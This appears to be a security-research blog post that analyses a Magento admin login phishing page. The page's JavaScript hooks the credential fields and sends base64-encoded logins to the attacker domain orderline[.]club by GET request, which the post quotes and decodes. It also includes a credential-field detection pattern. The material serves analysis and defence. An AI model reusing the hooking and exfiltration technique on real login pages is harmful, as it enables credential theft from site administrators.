Labs Note

Magento Phishing Leverages JavaScript For Exfiltration

October 14, 2020, Luke Leal


During a recent investigation, we found a Magento admin login phishing page on a compromised website, saved under the file name wp-order.php. That is an odd name for a Magento phishing page (the wp- prefix belongs to WordPress), but it nevertheless loads a convincing copy of the Magento 1.x admin login page.

Magento Admin Panel Phishing

What is not immediately apparent to the victim is that almost all of the page's assets, the images and the CSS, are loaded from a malicious domain, orderline[.]club:

Malicious Domain

Harvesting Magento Login Credentials

Most phishing pages we find exfiltrate the stolen data through a separate PHP file, or through PHP's mail functions, which email the credentials to the attacker. This page does neither.

Instead, it attaches a JavaScript change event listener (addEventListener) to the username field (id username) and the password field (id login, as on the Magento 1.x admin form):

...
function rever() {
  try {
    // Password field: id="login" on the Magento 1.x admin form
    document.getElementById('login').addEventListener('change', magetrack);
  } catch (err) {
    // field missing on this page: ignore and keep going
  }
  try {
    // Username field
    document.getElementById('username').addEventListener('change', magetrack);
  } catch (err) {
  }
...

A change event fires once a field's value has been modified and the field loses focus. So after the victim has typed the username and password and clicks (or tabs) anywhere outside the login fields, the phishing page automatically sends a GET request to orderline[.]club/fget.php carrying the stolen login data, without waiting for the form to be submitted.

GET /fget.php?eyJ1cmwiOiJodHRwOi8vbG9jYWxob3N0L3dwLW9yZGVyLnBocCIsImxvZ2luIjoiYWRtaW4iLCJwYXNzIjoiYWRtaW4ifQ==

The following recording shows the GET request going out after login data is entered into the fields, regardless of whether the Login button is pressed:

Data Exfiltration

The stolen login data is base64-encoded and sent as the bare query string of the request. Decoding the base64 from the GET request above yields:

{"url":"http://localhost/wp-order.php","login":"admin","pass":"admin"}
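The two helpers below are an added example, not code from the phishing kit or from Sucuri. The first recovers the credentials from a captured request line like the one above (tolerating percent-encoded or missing padding and the URL-safe base64 alphabet), so a responder can read what left the victim's browser from a proxy or network log. The second scans page source for the hook pattern shown earlier, a change listener attached by getElementById to a credential-looking field ID. The request line and the script sample are constructed for this example; the field IDs login and username are the ones the kit hooks.

```javascript
// Added example, not code from the phishing kit or from Sucuri: two helpers a
// responder can run offline, one over captured requests and one over page
// source. SAMPLE_REQUEST and SAMPLE_SCRIPT are constructed for this example.

// Return the raw query string of a request line ("GET /p?q HTTP/1.1") or a
// bare URL/path, or '' when there is none.
function extractQuery(requestLineOrUrl) {
  const token = requestLineOrUrl.trim().split(/\s+/).find((t) => t.includes('?'));
  if (!token) return '';
  return token.slice(token.indexOf('?') + 1).split('#')[0];
}

// The kit sends the payload as the whole query string (no key=value), so take
// the first '&'-separated chunk, undo percent-encoding (e.g. %3D padding),
// base64-decode it (Node accepts the standard and URL-safe alphabets and
// tolerates missing padding) and parse the JSON. Returns null when the
// request carries no such payload.
function decodeExfilRequest(requestLineOrUrl) {
  const chunk = extractQuery(requestLineOrUrl).split('&')[0];
  if (!chunk) return null;
  let blob;
  try { blob = decodeURIComponent(chunk); } catch (e) { return null; }
  if (!/^[A-Za-z0-9+\/_-]+=*$/.test(blob)) return null;
  try {
    const parsed = JSON.parse(Buffer.from(blob, 'base64').toString('utf8'));
    return parsed !== null && typeof parsed === 'object' ? parsed : null;
  } catch (e) {
    return null;
  }
}

// Find every `getElementById('<id>').addEventListener('change', <handler>)`
// in a script and report the field ID and handler name. This matches the
// exact shape of the kit's hook; `.onchange =` assignments or jQuery
// `.change(...)` would need extra patterns, which this heuristic omits.
const CHANGE_HOOK_RE =
  /getElementById\(\s*(['"])([^'"]+)\1\s*\)\s*\.addEventListener\(\s*(['"])change\3\s*,\s*([A-Za-z_$][\w$]*)/g;

function findChangeHooks(scriptSource) {
  return Array.from(scriptSource.matchAll(CHANGE_HOOK_RE),
    (m) => ({ field: m[2], handler: m[4] }));
}

// Keep only hooks on fields whose IDs look like credentials. 'login' is on
// the list because that is the password box's ID on the Magento 1.x admin form.
const CREDENTIAL_FIELD_RE = /^(user(name)?|login|pass(word|wd)?|pwd|email)$/i;

function credentialFieldHooks(hooks) {
  return hooks.filter((h) => CREDENTIAL_FIELD_RE.test(h.field)).map((h) => h.field);
}

// Constructed sample: the hook code quoted above, wrapped so it parses. The
// kit's magetrack() body is not reproduced; only the hooks are of interest.
const SAMPLE_SCRIPT = `
function magetrack(e) { /* handler body not reproduced */ }
function rever() {
  try { document.getElementById('login').addEventListener('change', magetrack); } catch (err) {}
  try { document.getElementById('username').addEventListener('change', magetrack); } catch (err) {}
}
`;

// Constructed sample log line carrying the payload shown above.
const SAMPLE_REQUEST =
  'GET /fget.php?eyJ1cmwiOiJodHRwOi8vbG9jYWxob3N0L3dwLW9yZGVyLnBocCIsImxvZ2luIjoiYWRtaW4iLCJwYXNzIjoiYWRtaW4ifQ== HTTP/1.1';

console.log(decodeExfilRequest(SAMPLE_REQUEST));
console.log(credentialFieldHooks(findChangeHooks(SAMPLE_SCRIPT)));
```

Run it with Node; the decoder prints the url, login and pass fields, and the scanner prints the two hooked field IDs. Because the beacon goes from the victim's browser straight to the attacker's host, the request line you feed to decodeExfilRequest will come from a proxy, EDR or packet capture on the victim side, not from the compromised site's own access log.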

Conclusion & Mitigation Steps

The code itself suggests that this phishing page is still under development by the attacker, so we may well see this style of exfiltration become more common on phishing pages in the future.

Phishing pages can be hard to detect, but website owners can use a file integrity monitoring solution to identify indicators of compromise such as an unexpected wp-order.php in the document root. Note that because this kit sends the credentials from the victim's browser straight to the attacker's domain, the compromised site's own server logs never record the stolen data; on the server the telltale is the foreign file, and in the page it is the third-party domain serving the assets. Google Search Console can also notify you about security problems like phishing.

If your website is exhibiting malicious behavior or you think it might have been compromised, you can follow the detailed instructions in our hacked website guide to remove the malware or reach out to our team for help with malware cleanup.


Categories: Ecommerce Security, Magento Security, Website Security. Tags: Black Hat Tactics, Hacked Websites, Phishing

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.
